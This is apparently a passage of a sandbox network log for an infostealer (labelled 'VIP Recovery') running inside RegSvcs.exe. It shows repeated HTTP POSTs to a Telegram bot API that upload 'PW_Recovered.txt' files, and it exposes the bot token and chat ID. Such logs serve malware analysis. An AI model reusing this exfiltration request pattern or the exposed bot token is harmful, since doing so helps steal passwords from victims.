                                                                          2024-09-19 10:22:50 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12771,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          50192.168.2.561575149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:50 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcdf9ea2613703
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:50 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 39 65 61 32 36 31 33 37 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcdf9ea2613703Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:22:50 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:50 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 562
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:50 UTC562INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12772,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          51192.168.2.561578149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:54 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce1f6e390835f
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:54 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 66 36 65 33 39 30 38 33 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dce1f6e390835fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:22:54 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:54 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:54 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12774,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          52192.168.2.561579149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:54 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce3d56841fb19
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:54 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 33 64 35 36 38 34 31 66 62 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dce3d56841fb19Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:22:54 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:54 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 559
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:54 UTC559INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12775,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          53192.168.2.561582149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:58 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce27d7cd6f4d1
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:58 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 32 37 64 37 63 64 36 66 34 64 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dce27d7cd6f4d1Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:22:58 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:58 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:58 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12776,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          54192.168.2.561583149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:58 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce4554f19dcc3
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:58 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 35 35 34 66 31 39 64 63 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dce4554f19dcc3Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:22:58 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:58 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:58 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12777,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          55192.168.2.561586149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:02 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce309cdaf4648
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:02 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 33 30 39 63 64 61 66 34 36 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dce309cdaf4648Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:03 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:03 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:03 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12780,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          56192.168.2.561587149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:02 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce690e0867cd4
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:02 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 36 39 30 65 30 38 36 37 63 64 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dce690e0867cd4Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:23:03 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:03 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
